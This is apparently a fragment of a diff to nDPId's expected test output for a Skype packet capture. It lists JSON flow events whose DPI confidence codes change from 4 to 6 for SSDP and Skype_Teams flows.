00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1431969715510,"flow_last_seen":1431969755612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2898,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1431969718289,"flow_last_seen":1431969752365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1431969718289,"flow_last_seen":1431969752365,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50127,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1431969648258,"flow_last_seen":1431969808391,"flow_idle_time":200000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":26161,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1431969648258,"flow_last_seen":1431969808391,"flow_idle_time":200000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":26161,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969783628,"flow_last_seen":1431969808684,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969783628,"flow_last_seen":1431969808684,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":99,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50141,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969784741,"flow_last_seen":1431969808951,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969784741,"flow_last_seen":1431969808951,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969789490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969789490,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1431969771806,"flow_last_seen":1431969808100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2836,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969698797,"flow_last_seen":1431969718921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":1336,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969642337,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 